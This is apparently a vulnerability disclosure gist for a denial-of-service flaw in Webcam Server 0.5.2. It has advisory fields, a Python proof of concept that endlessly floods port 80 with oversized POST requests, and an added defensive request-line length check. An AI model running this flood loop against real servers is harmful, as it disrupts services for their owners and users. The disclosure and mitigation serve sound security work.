@0xHop
Created December 15, 2021 02:21
WebCam Server v0.5.2 Denial of Service
[description]
Webcam Server version 0.5.2 and earlier does not properly clean up memory when handling HTTP requests. Multiple large requests trigger an unhandled structured exception (SEH), which crashes the application.
------------------------------------------
[VulnerabilityType Other]
Denial of Service
------------------------------------------
[Vendor of Product]
en3rgy
------------------------------------------
[Affected Product Code Base]
Webcam Server 0.5.2 and below
------------------------------------------
[Affected Component]
Webcam Server process
------------------------------------------
[Attack Type]
Remote
------------------------------------------
[Impact Code execution]
False
------------------------------------------
[Impact Escalation of Privileges]
False
------------------------------------------
[Impact Information Disclosure]
False
------------------------------------------
[Attack Vectors]
Repeated large HTTP Requests
------------------------------------------
[Reference]
https://sourceforge.net/projects/webcamserv/
------------------------------------------
[Has vendor confirmed or acknowledged the vulnerability?]
false
------------------------------------------
import socket

# Target is the local test instance of Webcam Server.
ip = "127.0.0.1"
port = 80

while True:
    # Large request target, as described under [Attack Vectors].
    buffer = b"A" * 8000
    request = b"POST " + buffer + b" HTTP 1.1"
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect((ip, port))
    s.send(request)
    s.close()
    print("sending packet")
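
For defenders, a bounded request-line reader shows the input handling that rejects this request shape before it is buffered. This is an added example, not part of the original gist and not Webcam Server code; the function names, the 4096-byte cap and the timeouts are assumptions chosen for illustration.

```python
import socket

MAX_REQUEST_LINE = 4096  # assumed cap; the gist's requests carry an 8000-byte target
READ_TIMEOUT = 5.0       # assumed seconds to wait for the request line


def read_request_line(conn, limit=MAX_REQUEST_LINE, timeout=READ_TIMEOUT):
    """Return (status, line): 200 plus the request line, or the HTTP error
    status to answer with before closing the connection."""
    conn.settimeout(timeout)
    buf = bytearray()
    while b"\r\n" not in buf:
        if len(buf) > limit:
            return 414, b""  # stop reading; never buffer an unbounded line
        try:
            chunk = conn.recv(1024)
        except socket.timeout:
            return 408, b""  # slow or stalled sender
        if not chunk:
            return 400, b""  # peer closed before terminating the line
        buf += chunk
    line = bytes(buf).split(b"\r\n", 1)[0]
    parts = line.split(b" ")
    if len(line) > limit:
        return 414, b""
    if len(parts) != 3 or parts[2] not in (b"HTTP/1.0", b"HTTP/1.1"):
        return 400, b""
    return 200, line


def status_for(payload):
    """Feed constructed bytes through a local socket pair; return the status."""
    client, server = socket.socketpair()
    try:
        client.sendall(payload)
        client.shutdown(socket.SHUT_WR)
        return read_request_line(server, timeout=1.0)[0]
    finally:
        client.close()
        server.close()


if __name__ == "__main__":
    # Constructed inputs: a normal request, then the request shape from the gist.
    print(status_for(b"GET /index.html HTTP/1.1\r\nHost: cam\r\n\r\n"))
    print(status_for(b"POST " + b"A" * 8000 + b" HTTP 1.1"))
```

The same limits can be enforced by a reverse proxy placed in front of the unpatched service, so the oversized request never reaches the Webcam Server process.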